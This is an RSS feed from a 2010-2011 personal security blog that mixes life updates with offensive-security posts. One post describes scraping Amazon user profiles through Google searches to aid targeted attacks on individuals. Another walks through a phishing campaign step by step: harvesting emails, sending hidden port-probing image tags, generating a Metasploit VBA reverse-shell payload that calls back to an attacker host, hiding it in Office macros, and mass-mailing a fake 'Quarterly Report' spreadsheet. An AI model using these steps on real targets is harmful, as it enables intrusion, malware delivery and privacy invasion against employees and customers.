<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>FreedomCoder &#187; News</title>
	<atom:link href="http://www.freedomcoder.com.ar/category/news/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.freedomcoder.com.ar</link>
	<description>Information for free-minded geeks</description>
	<lastBuildDate>Sun, 30 Jan 2011 22:38:35 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>El adios a una decada &#8230; The good bye to a decade</title>
		<link>http://www.freedomcoder.com.ar/2011/01/30/el-adios-a-una-decada-the-good-bye-to-a-decade/</link>
		<comments>http://www.freedomcoder.com.ar/2011/01/30/el-adios-a-una-decada-the-good-bye-to-a-decade/#comments</comments>
		<pubDate>Sun, 30 Jan 2011 19:57:40 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Spanish]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/?p=406</guid>
		<description><![CDATA[<p>~~English~~:</p> <p>My last day of this decade. Had an awesome time this past 10 years. I learned a lot of things, I graduated, got married, lived in several different places and cities, hacked many thing, read plenty of code jejejej, etc&#8230;</p> <p>Wow, looking back is both short and so long. All that I prey is [...]]]></description>
			<content:encoded><![CDATA[<p><strong>~~English~~:</strong></p>
<p>My last day of this decade. Had an awesome time this past 10 years. I learned a lot of things, I graduated, got married, lived in several different places and cities, hacked many thing, read plenty of code jejejej, etc&#8230;</p>
<p>Wow, looking back is both short and so long. All that I prey is to have lots of years ahead of me and even more challenges with lots of fun.</p>
<p>Thanks you all &#8230;</p>
<p>Most specially thanks to my lovely Vicky, our families and all those who were part of this GREAT journey.</p>
<p>MUCHAS GRACIAS&#8230;.</p>
<p><strong>~~Spanish~~:</strong></p>
<p>Mi ultimo dia de esta decada. La verdad que tuve unos fantasticos 10 an~os. Aprendi muchas cosas nuevas, me gradue, me case, vivi en varios lugares en varias ciudades, hackie muchas cosas y lei mas que suficiente codigo ejejeje, etc &#8230;</p>
<p>Wow, mirando hacia atras se ve corto y tan largo a la vez. Todo lo que pido/rezo es poder tener muchos an~os mas y muchos desafios nuevos para pasarla bien.</p>
<p>Gracias a todos ..</p>
<p>Especialmente gracias a mi amada Vicky, a nuestras familias y a todos los que han sido parte de esta FANTASTICO viaje llamado vida.</p>
<p>THANKS A LOT &#8230;&#8230;</p>
<p><a href="http://www.freedomcoder.com.ar/wp-content/uploads/2011/01/180698_10150091021017243_603657242_6075266_5722496_n.jpg"><img class="aligncenter size-full wp-image-407" title="180698_10150091021017243_603657242_6075266_5722496_n" src="http://www.freedomcoder.com.ar/wp-content/uploads/2011/01/180698_10150091021017243_603657242_6075266_5722496_n.jpg" alt="" width="720" height="360" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2011/01/30/el-adios-a-una-decada-the-good-bye-to-a-decade/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Amazon Users&#8217; info Crawler</title>
		<link>http://www.freedomcoder.com.ar/2010/07/11/amazon-users-info-crawler/</link>
		<comments>http://www.freedomcoder.com.ar/2010/07/11/amazon-users-info-crawler/#comments</comments>
		<pubDate>Sun, 11 Jul 2010 14:15:40 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/?p=318</guid>
		<description><![CDATA[<p>Another weekend and another crawler. This time it is not emails, but nonetheless interesting data from a big gadget store.<br /> Surfing through the site for gadgets, I found that Amazon has some interesting Profile data about it&#8217;s users such as location, date of birth, wish list, interested persons list,  reviews done to gadgets, etc &#8230;</p> <p>Looking [...]]]></description>
			<content:encoded><![CDATA[<p>Another weekend and another crawler. This time it is not emails, but nonetheless interesting data from a big gadget store.<br />
<img class="aligncenter" title="amazon.com" src="http://www.textually.org/textually/archives/2009/11/15/amazonlogo.jpg" alt="" width="559" height="164" />Surfing through the site for gadgets, I found that Amazon has some interesting Profile data about it&#8217;s users such as location, date of birth, wish list, interested persons list,  reviews done to gadgets, etc &#8230;</p>
<p>Looking at the URL it was obvious that this could be automated to obtain most, if not the entire list of amazon users.  As it turns out a simple  Google search with</p>
<h3 style="text-align: center;"><strong><span style="color: #808080;">site:http://www.amazon.com/gp/pdp/profile/</span></strong></h3>
<p><a href="http://www.freedomcoder.com.ar/wp-content/uploads/2010/07/Screen-shot-2010-07-11-at-12.22.37-AM.jpg"><img class="aligncenter size-full wp-image-320" title="amazon google search" src="http://www.freedomcoder.com.ar/wp-content/uploads/2010/07/Screen-shot-2010-07-11-at-12.22.37-AM.jpg" alt="" width="572" height="321" /></a></p>
<p>Once I saw that, it was just a matter of writing a small script to harvest all the profiles out of Google and then parse each individual profile for useful information, as it is shown on the screenshot below where it is shows how simple is to gather information such as user location.</p>
<p><a href="http://www.freedomcoder.com.ar/wp-content/uploads/2010/07/Screen-shot-2010-07-11-at-10.49.12-AM.jpg"><img class="aligncenter size-full wp-image-326" title="PoC of Amazon Crawler" src="http://www.freedomcoder.com.ar/wp-content/uploads/2010/07/Screen-shot-2010-07-11-at-10.49.12-AM.jpg" alt="" width="794" height="436" /></a></p>
<p>Once I had a proof of concept done. I started to think how could I use this data, besides the fact that is a simple info disclosure from the part of amazon.</p>
<p>As you might imagine I&#8217;m always on the hunt for new ways to improve ESearchy info gathering. I&#8217;ve reached a limit into how many emails or new persons I can easily get for free online.  Because of these, lately, I have changed/expanded the searches from adding more persons to adding more detailed information about each individual target.  First it was the profiling  option on esearchy that searches within each users profile for other social networks, friends/co-workers, photos, or personal sites.</p>
<p>Having this now, I thought that we could expand the information to shopping information offered on the profiles, such as the wish list, the reviewed items &#8211;which is almost sure that they own such item&#8211;, etc ..</p>
<p><a href="http://www.freedomcoder.com.ar/wp-content/uploads/2010/07/Screen-shot-2010-07-11-at-11.02.38-AM.jpg"><img class="aligncenter size-full wp-image-327" title="Amazon Wish List Sample" src="http://www.freedomcoder.com.ar/wp-content/uploads/2010/07/Screen-shot-2010-07-11-at-11.02.38-AM.jpg" alt="" width="647" height="271" /></a></p>
<p>So what if we wanted to target each individual target, we could crawl the entire google results DB one and store that into an offline DB, and or look for a  way to search for individual persons from this results.  What if we take the persons name obtained from LinkedIn, Spoke, etc and add that to our Google Search parameter.</p>
<h3 style="text-align: center;"><span style="color: #888888;">site:http://www.amazon.com/gp/pdp/profile/ Susan Emery</span></h3>
<p><span style="color: #888888;"><span style="color: #000000;"></p>
<p>That will easily return only a few results for which we could use some kind of  partial regular expresion with percentage for completeness and take a huge leap into saying that both persons are the same and that those are the times that he/she wants. </span></span></p>
<p><span style="color: #888888;"><span style="color: #000000;">So there it goes, more possible useful information that will allow us to generate even better and more targeted attacks against a particular person. </span></span></p>
<p><span style="color: #888888;"><span style="color: #000000;">Happy Hacking</span></span></p>
<p>Proof of Concept Code:<br />
<script src="http://gist.github.com/471577.js?file=amazon_crawler.rb"></script></p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-7949681675937032";
google_ad_slot = "5601631059";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2010/07/11/amazon-users-info-crawler/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Client-side Penetration Testing with ESearchy &amp; EMaily</title>
		<link>http://www.freedomcoder.com.ar/2010/07/09/client-side-penetration-testing-with-esearchy-emaily/</link>
		<comments>http://www.freedomcoder.com.ar/2010/07/09/client-side-penetration-testing-with-esearchy-emaily/#comments</comments>
		<pubDate>Fri, 09 Jul 2010 22:45:55 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/?p=227</guid>
		<description><![CDATA[General Information <p style="text-align: center;"><a href="http://www.freedomcoder.com.ar/wp-content/uploads/2010/06/frustrated_computer_user.jpg"></a></p> &#8230;&#8221;our employees are responsable and security aware&#8221;&#8230;. &#8230;&#8221;They have admin access, because we trust them &#8220;&#8230;. &#8230;.&#8221;I thought it was safe to open that file. Robert from IT sent it to me&#8221; &#8230; &#8230;.etc&#8230; <p>Nowadays,  computers networks, are &#8220;&#8221;"&#8221;usually&#8221;"&#8221;" secure. Finding an exploitable remote network vulnerability is getting more [...]]]></description>
			<content:encoded><![CDATA[<h3>General Information</h3>
<p style="text-align: center;"><a href="http://www.freedomcoder.com.ar/wp-content/uploads/2010/06/frustrated_computer_user.jpg"><img class="aligncenter size-full wp-image-245" style="border: 5px solid black;" title="frustrated_computer_user" src="http://www.freedomcoder.com.ar/wp-content/uploads/2010/06/frustrated_computer_user.jpg" alt="" width="239" height="159" /></a></p>
<h4 style="text-align: center;"><em><span style="color: #ff0000;">&#8230;&#8221;our employees are responsable and security aware&#8221;&#8230;.</span></em></h4>
<h4 style="text-align: center;"><em><span style="color: #ff0000;">&#8230;&#8221;They have admin access, because we trust them &#8220;&#8230;.</span></em></h4>
<h4 style="text-align: center;"><em><span style="color: #ff0000;">&#8230;.&#8221;I thought it was safe to open that file. Robert from IT sent it to me&#8221; &#8230;</span></em></h4>
<h4 style="text-align: center;"><em><span style="color: #ff0000;">&#8230;.etc&#8230;</span></em></h4>
<p>Nowadays,  computers networks, are &#8220;&#8221;"&#8221;usually&#8221;"&#8221;" secure. Finding an exploitable remote network vulnerability is getting more and more difficult. This is due to several reasons, such as operating system are safer, patching is slowly becoming a must  for all production applications, etc.</p>
<p>But, what about the corporate networks ? Do companies secure their networks the same way they do production servers? The answer is NO.  For thousands of motives, workstations are never kept up-to-date, nor properly setup.  In top of that, we have the end-users ( including IT admins), an amazing set of people that do amazing tasks, such as manage to infect their computer in less than two days, install all those crazy apps, and/or open all those links that have explicit <strong><span style="color: #ff6600;">DO NOT OPEN VIRUS FOUND.</span></strong></p>
<p>Anyways, to make a story short, hackers, spammers, botnets, and all the &#8220;bad&#8221; guys are constnatly taken advantage of the ancient weakest link in all type of security; &#8220;<span style="color: #3366ff;">The human factor</span>&#8220;.   It does not matter how much you harden a computer, you can count on human ingenuity &#8211; &#8230;or should I say stupidity&#8230; &#8212; to find an unthinkable way to open and compromise their workstation.</p>
<p>In addition, nowadays, everybody wants to check their Facebook, LinkedIn, email, twitter, GMail. Basically,  it is human nature to be inform ( &#8230; gossip ).  Attackers know this and they count on people curiosity and need of information to craft their these types of attacks.</p>
<p>Client-side attacks, AKA social enginerring attacks,  social engineering penetration tests, basically the not so-new remote exploit trend.</p>
<p>It is worth noting that these type of attacks have existed for a long time, but now due to the tightness of security in networking on one hand and the expansion and rapid grow of social networks on the other hand; it has gained a lot of strength and  new types of attacks are appearing daily.</p>
<p>Types of attacks:</p>
<ul>
<li>emails</li>
<li>websites</li>
<li>Social networks ( Facebook, Orkut, twitter, Linkedin, &#8230; )</li>
<li>Forums</li>
<li>Physical ( pendrive, CD, phone, cellphones, ipods, ipads, etc )</li>
</ul>
<p>Enough of  the BS talk let get dirty and talk about how to actually perform a client-side attack.</p>
<h3>Info gathering Phase ( Reconnaissance )</h3>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-263" title="social_networking_sites" src="http://www.freedomcoder.com.ar/wp-content/uploads/2010/06/social_networking_sites.jpg" alt="" width="400" height="300" /></p>
<p>Like in any other type of penetration test, we need to gather information.  The only difference here is that instead of looking for operating system and software versions and vulnerabilities we need to search information about the company, their employees, their social networks, etc.</p>
<p>I guess that when we are performing a test we would have some limitations with regards to privacy and employess private life, but the true is that a real attacks won&#8217;t have such limitations. So the simple rule is the more information you have the better. Everything is relevant information. Everything from sample company documents all they way down to what place some employee went to dinner last week and with whom.</p>
<p>Luckily for us, <a href="http://en.wikipedia.org/wiki/Mark_Zuckerberg">Mark Zuckerberg</a> ( creator of Facebook ) has made our life much easier convincing people they are supposed to forget abour privacy and share as much information as they can with as much people as they can.</p>
<p>Depending on the type of attack we are performing, the type of data we will need, but most surely we will be needing  plenty of email accounts from the company being assess. There are many tools capable of performing OSINT ( Open Source Intelligence) theHarverster, Paterva&#8217;s Maltego, et and  of course ESearchy.</p>
<p>Esearchy is a small ruby library capable of searching the internet for email addresses and persons. Currently, the supported searching engines are, but not limited to:</p>
<ul>
<li>Search engines:
<ul>
<li>Google</li>
<li>Bing</li>
<li>Yahoo,</li>
<li>AltaVista</li>
</ul>
</li>
<li>Social Engines:
<ul>
<li>LinkedIn</li>
<li>Google Profiles</li>
<li>Naymz</li>
<li>Classmantes</li>
<li>Spoke</li>
</ul>
</li>
<li>Other Engines
<ul>
<li>PGP servers</li>
<li>Usenets</li>
<li>GoogleGroups Search</li>
<li>Spider</li>
<li>LDAP</li>
</ul>
</li>
</ul>
<p>In addition to that, ESearchy downloads several types of files and searches their contents for emails.</p>
<p>File types supported, but not limited to:</p>
<ul>
<li>PDF</li>
<li>DOC</li>
<li>DOCX</li>
<li>XLSX</li>
<li>PPTX</li>
<li>ODT</li>
<li>ODP</li>
<li>ODS</li>
<li>ODB</li>
<li>ASN</li>
<li>TXT</li>
</ul>
<p>Installation:</p>
<p><code> $&gt; sudo gem sources -a http://gems.github.com<br />
$&gt; sudo gem install gemcutter<br />
$&gt; sudo gem install esearchy</code></p>
<p>If you are installing it in backtrack follow the following how-to &#8220;<a title="Installing ESearchy on Backtrack 4.0" href="http://www.freedomcoder.com.ar/?p=206">Installing ESearchy on Backtrack 4.0</a>&#8221;</p>
<p>The application supports several types of searches using the esearchy command and or you can create custom scripts using the esearchy library.  Using the tool is simple, for example:</p>
<p><span style="font-family: monospace;">$&gt; esearchy -q @company.com &#8211;enable-gmail &#8211;enable-gpg<br />
$&gt; esearchy -q @company.com -c &#8220;Company Inc&#8221; &#8211;enable-people &#8211;profiling</span></p>
<p>After this we need to find information about the DNS servers, the mail servers and any other information that we usually do get as part of any penetration test.  A good tip, is to check the SMTP server for vulnerabilities such as information disclosures using VRFY, EXPN, etc &#8230;</p>
<h3>Software and Physical network</h3>
<p>Once we have a target list ( emails, names, etc .. ), We need to start performing an assessment on the network from within. One possible way of doing this is by sending one or more rounds of emails using specially crafted html templated emails consisting of several image tags pointing to different ports. and here is when a tool such as EMaily comes in.</p>
<p>Emaily is a command line tool created to send multiple templated emails using several servers at the same time. It contains many templates, but users can create their own templates and populate them as needed. It is worth noting that EMaily is also an expandable ruby library.</p>
<p><code>&lt;img src="http://site:80/80.jpg?e=test@test.com style="display:none" /&gt;<br />
&lt;img src="http://site:8080/8080.jpg?e=test@test.com style=" display:none" /&gt;<br />
&lt;img src="http://site:443/443.jpg?e=test@test.com style="display:none" /&gt;<br />
&lt;img src="http://site:1080/1080.jpg?e=test@test.com style=" display:none" /&gt;<br />
&lt;img src="http://site:139/139.jpg?e=test@test.com style=" display:none" /&gt;<br />
&lt;img src="http://site:445/445.jpg?e=test@test.com style=" display:none" /&gt;</code></p>
<p>This can be automatically generated using EMaily template system as it is shown on the following code snipet, by simply using the <strong>%%payload[port 1, ... ,port n]%%</strong></p>
<p><script src="http://gist.github.com/449467.js?file=template_sample.html"></script></p>
<p>As we can see from the output generated by EMaily this will test egressing rules, obtain information such as operating system, email client used, IP addresses, etc&#8230;</p>
<p><a href="http://www.freedomcoder.com.ar/wp-content/uploads/2010/07/Screen-shot-2010-07-09-at-7.12.11-PM.jpg"><img class="aligncenter size-full wp-image-293" title="Emaily scanport payload" src="http://www.freedomcoder.com.ar/wp-content/uploads/2010/07/Screen-shot-2010-07-09-at-7.12.11-PM.jpg" alt="" width="686" height="365" /></a></p>
<p><strong>Penetration Phase</strong></p>
<p>Once we have obtained enough information about the company&#8217;s users and network infrastructure, it is time to concentrate all our efforts in attacking the company using all possible methods. There are many types of ways to compromise an end user. The most common methods are sending emails with certain types of attachments, such as pdf, Word, Excel, PowerPoint, executables, etc. Pretty much anything is possible and allowed.</p>
<p><em><strong>VBA Attacks</strong></em></p>
<p>One of the most commons methods to compromise a workstation is through a VBA payload. This is achieved using a word, excel or powerpoint file that contains a malicious script that will generate and execute, most commonly, a reverse shell. ( metasploit, Core Impact, custom built )</p>
<p>It is worth noting that when generating the payload we should use the open port information we got from our information gathering phase, so we are sure we can connect back to our MSF instance.</p>
<p>Sample Metasploit command to generate a reverse tcp vnc inject payload.</p>
<p><code>&gt; msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.1 V &gt; vbvnc.bas</code></p>
<p><code> </code></p>
<p>Once we have the payload we need to add it to a file. Here is where the experience, artist skills come in handy. The more credible the file the higher the chances for an employee to open the document. Usually, it is recommended to search in google, bing, yahoo for documents made or related to the company in question. This docs, should contain information such as logos, speeches and other corporate standards, that will make the attack more credible.</p>
<p>First open the document in question and open the Visual Editor for macros.</p>
<p>After that copy the content of the first part of the .bas script into the editor, save and quit the macro.</p>
<p><a href="http://www.freedomcoder.com.ar/wp-content/uploads/2010/06/Screen-shot-2010-06-25-at-10.31.49-AM.jpg"><img class="aligncenter size-full wp-image-278" title="Visual Basic Editor" src="http://www.freedomcoder.com.ar/wp-content/uploads/2010/06/Screen-shot-2010-06-25-at-10.31.49-AM.jpg" alt="" width="557" height="266" /></a></p>
<p>The second part &#8220;the actual payload&#8221; should be stored in the end of the document, if we are using a MS Word document.</p>
<p style="text-align: center;"><a href="http://www.freedomcoder.com.ar/wp-content/uploads/2010/06/Screen-shot-2010-06-25-at-10.35.52-AM.jpg"><img class="aligncenter size-full wp-image-277" title="Macro" src="http://www.freedomcoder.com.ar/wp-content/uploads/2010/06/Screen-shot-2010-06-25-at-10.35.52-AM.jpg" alt="" width="783" height="528" /></a></p>
<p>It is worth noting, that if we use the latest version of the MSF VBA attack  (3.4.x ) we will only be able to use it in  Microsoft Word, but with a couple changes, we should be able to add it to Excel as well.   Instead of using the payload as paragraphs we can paste then into the macro. Adding as a stream ( as it used to be done ) and or by  using  chr() method.</p>
<div id="_mcePaste">&#8230;</div>
<div>s = s + chr(38) + chr(72) + chr(53) + chr(65)</div>
<div id="_mcePaste">s = s + chr(38) + chr(72) + chr(57) + chr(48)</div>
<div id="_mcePaste">s = s + chr(38) + chr(72) + chr(48) + chr(48)</div>
<div id="_mcePaste">s = s + chr(38) + chr(72) + chr(48) + chr(51)</div>
<div id="_mcePaste">s = s + chr(72) + chr(38  + chr(48) + chr(48)</div>
<div id="_mcePaste">s = s + chr(38)
</div>
<p>Once we have this setup Excel setup, it is time to use all the available emails and launch our first round of client-side attacks using EMaily again but this time we should use another template such as an internal email or something that would convince users to open the attached Excel sheet ( I leave that for later .. ).</p>
<p>For example if we want to send emails using servers 1,2,3,4 in blocks of 100 emails and we want to do it all at the same time ( Threaded) with a small scanports that would allow us to know who opened the email, we would have to execute the following command.</p>
<p><code>&gt; emaily -S server1,server2,server4,server4 -b 100 -T --subject "Quaterly Report" -t templates/q_report.html -l ~/company_emails.csv -a ~/tmp/Q4_Financial_Report.xls --webserver --scanports 80,443</code></p>
<p>Well, now is time layback, get some mate with alfajores and wait until users start executing the excel payload and we get connection back. After that sky is the limit &#8230;. HACK the entire company &#8230;.</p>
<p>Happy Hacking !!!!</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-7949681675937032";
google_ad_slot = "5601631059";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2010/07/09/client-side-penetration-testing-with-esearchy-emaily/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>I&#8217;m a P1r4t3 now !</title>
		<link>http://www.freedomcoder.com.ar/2010/05/24/im-a-p1r4t3-now/</link>
		<comments>http://www.freedomcoder.com.ar/2010/05/24/im-a-p1r4t3-now/#comments</comments>
		<pubDate>Mon, 24 May 2010 14:00:15 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/?p=210</guid>
		<description><![CDATA[<p>Lately, a lot of things are changing in my life. A month and a half ago one of the things that changed  was &#8220;the job&#8221;.</p> <p>I&#8217;m currently working for IOActive. Last week while I was visiting headquarters. Our official initialization was performed: &#8220;After many beers, a Jagermeister shot, and many hot dogs; I became an [...]]]></description>
			<content:encoded><![CDATA[<p>Lately, a lot of things are changing in my life. A month and a half ago one of the things that changed  was &#8220;the job&#8221;.</p>
<p>I&#8217;m currently working for <strong>IOActive</strong>. Last week while I was visiting headquarters. Our official initialization was performed: &#8220;After many beers, a Jagermeister shot, and many hot dogs; I became an official IOActive P1r4t3&#8243;</p>
<p><span style="color: #ff0000;"><strong>Thanks for all the good times pimps and hoouuus !</strong></span></p>
<p style="text-align: center;"><a href="http://www.freedomcoder.com.ar/wp-content/uploads/2010/05/IMG_1052.jpg"><img class="aligncenter" title="IMG_1052" src="http://www.freedomcoder.com.ar/wp-content/uploads/2010/05/IMG_1052-225x300.jpg" alt="" width="203" height="270" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2010/05/24/im-a-p1r4t3-now/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Another year is in the can! Welcome 29s</title>
		<link>http://www.freedomcoder.com.ar/2010/01/31/another-year-is-in-the-can-welcome-29s/</link>
		<comments>http://www.freedomcoder.com.ar/2010/01/31/another-year-is-in-the-can-welcome-29s/#comments</comments>
		<pubDate>Sun, 31 Jan 2010 13:35:09 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/?p=198</guid>
		<description><![CDATA[<p><a href="http://www.freedomcoder.com.ar/wp-content/uploads/2010/01/gits_grunge1024.jpg"></a>Yes, today is my b-day. Hence I decided to add a few lines in this &#8220;kind of&#8221; forgotten blog.<br /> Lately, I being doing plenty of interesting stuff, but haven&#8217;t had the time to sit and write about those things.</p> <p>Here are a few updates.<br /> * ESearchy-NG has a few new features. (Spoke [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.freedomcoder.com.ar/wp-content/uploads/2010/01/gits_grunge1024.jpg"><img class="alignleft size-thumbnail wp-image-199" style="border: 5px solid white;" title="gits_grunge1024" src="http://www.freedomcoder.com.ar/wp-content/uploads/2010/01/gits_grunge1024-150x150.jpg" alt="" width="150" height="150" /></a>Yes, today is my <strong>b-day</strong>. Hence I decided to add a few lines in this &#8220;kind of&#8221; forgotten blog.<br />
Lately, I being doing plenty of interesting stuff, but haven&#8217;t had the time to sit and write about those things.</p>
<p>Here are a few updates.<br />
* <strong>ESearchy-NG</strong> has a few new features. (Spoke being one of them)</p>
<p>* <strong>EMaily</strong> is almost finished. I have started testing and I&#8217;m looking for people willing to test this buggy version.  (ohhh&#8230; EMaily is an automated companion tool to send client-side emails to hundred or thousands of people in different servers using customizable templates, etc. )</p>
<p>* <strong>Several other researches</strong> are on my table slowly developing into interesting tools or projects.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2010/01/31/another-year-is-in-the-can-welcome-29s/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New blog</title>
		<link>http://www.freedomcoder.com.ar/2009/08/04/new-blog/</link>
		<comments>http://www.freedomcoder.com.ar/2009/08/04/new-blog/#comments</comments>
		<pubDate>Wed, 05 Aug 2009 01:31:38 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/?p=159</guid>
		<description><![CDATA[<p>After many nights of searching the internez for a script capable of migrating from Drupal to WordPress, I finally found a script for an old version of Drupal. I had to do some work in order to make it work but after a couple of hours of trial and error I managed to modified and improve [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-thumbnail wp-image-160" style="margin: 5px; border: 2px solid black;" title="Photo-0042" src="http://www.freedomcoder.com.ar/wp-content/uploads/2009/08/Photo-0042-150x150.jpg" alt="Photo-0042" width="150" height="150" />After many nights of searching the internez for a script capable of migrating from Drupal to WordPress, I finally found a script for an old version of Drupal. I had to do some work in order to make it work but after a couple of hours of trial and error I managed to modified and improve to old ruby script.</p>
<p>Now, I have a brand new CMS which I&#8217;m still finishing some details, but I hope you find this blog better and more likable than the old one. Comments and questions are accepted.</p>
<p>Enjoy.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2009/08/04/new-blog/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>I&#8217;m back with some Code &#8230;</title>
		<link>http://www.freedomcoder.com.ar/2009/07/05/im-back-with-some-code-/</link>
		<comments>http://www.freedomcoder.com.ar/2009/07/05/im-back-with-some-code-/#comments</comments>
		<pubDate>Mon, 06 Jul 2009 01:46:17 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[macosx]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2009/07/05/im-back-with-some-code-</guid>
		<description><![CDATA[Well, hello again, long time since the last post. I went on vacations, work a lot and did some programming. Let's talk abount the programming part, since it is the most interesting one. ;)

I created a small library called "Esearchy" capable of searching the internet for email addresses. Currently, we the supported search methods are  engines such as Google, Bing, Yahoo, PGP servers, GoogleGroups, etc , but I intend to add many more.
Also, the library searches inside .pdf and .txt files for emails addresses and adds them to the list of found accounts.  

For now, there are two main ways of performing a search, "the ruby way"
<code>
 Esearchy.create "domain.com" do &#124;domain&#124;
   domain.maxhits = 500
   domain.search
   domain.clean {&#124;e&#124; e =~ /<&#124;>/ }
   domain.save_to_file "~/emails.txt"
 end
</code>

and the more classic way in which users can create an Esearchy objetc and work on it

<code>
  domain = Esearchy.new :query => "domain.com", :maxhits => 500
  domain.search
  domain.save_to_file "~/emails.txt"
</code>

For now , that's it for now , but keep on tuned for more shitty code ajjajaa 
]]></description>
			<content:encoded><![CDATA[<p>Well, hello again, long time since the last post. I went on vacations, work a lot and did some programming. Let&#8217;s talk abount the programming part, since it is the most interesting one. <img src='http://www.freedomcoder.com.ar/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>I created a small library called &#8220;Esearchy&#8221; capable of searching the internet for email addresses. Currently, we the supported search methods are  engines such as Google, Bing, Yahoo, PGP servers, GoogleGroups, etc , but I intend to add many more.<br />
Also, the library searches inside .pdf and .txt files for emails addresses and adds them to the list of found accounts.  </p>
<p>For now, there are two main ways of performing a search, &#8220;the ruby way&#8221;<br />
<code> Esearchy.create "domain.com" do |domain|<br />
   domain.maxhits = 500<br />
   domain.search<br />
   domain.clean {|e| e =~ /&lt;|&gt;/ }<br />
   domain.save_to_file "~/emails.txt"<br />
 end</code></p>
<p>and the more classic way in which users can create an Esearchy objetc and work on it</p>
<p><code>  domain = Esearchy.new :query =&gt; "domain.com", :maxhits =&gt; 500<br />
  domain.search<br />
  domain.save_to_file "~/emails.txt"</code></p>
<p>For now , that&#8217;s it for now , but keep on tuned for more shitty code ajjajaa </p>
]]></content:encoded>
			<wfw:commentRss>http://www.freedomcoder.com.ar/2009/07/05/im-back-with-some-code-/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>I&#8217;m going LOCO on Friday !!!</title>
		<link>http://www.freedomcoder.com.ar/2009/04/01/im-going-loco-on-friday-/</link>
		<comments>http://www.freedomcoder.com.ar/2009/04/01/im-going-loco-on-friday-/#comments</comments>
		<pubDate>Thu, 02 Apr 2009 00:18:16 +0000</pubDate>
		<dc:creator>FreedomCoder</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.freedomcoder.com.ar/2009/04/01/im-going-loco-on-friday-</guid>
		<description><![CDATA[Nos vemos en LocosxRails 2009 ... Espero pasarla mas que bien y que a la gente le gusta la charla.

<img src="http://www.freedomcoder.com.ar/files/Picture 2.jpg" alt="Picture 2.jpg" border="0" width="571" height="555" />]]></description>
			<content:encoded><![CDATA[<p>Nos vemos en LocosxRails 2009 &#8230; Espero pasarla mas que bien y que a la gente le gusta la charla.</p>
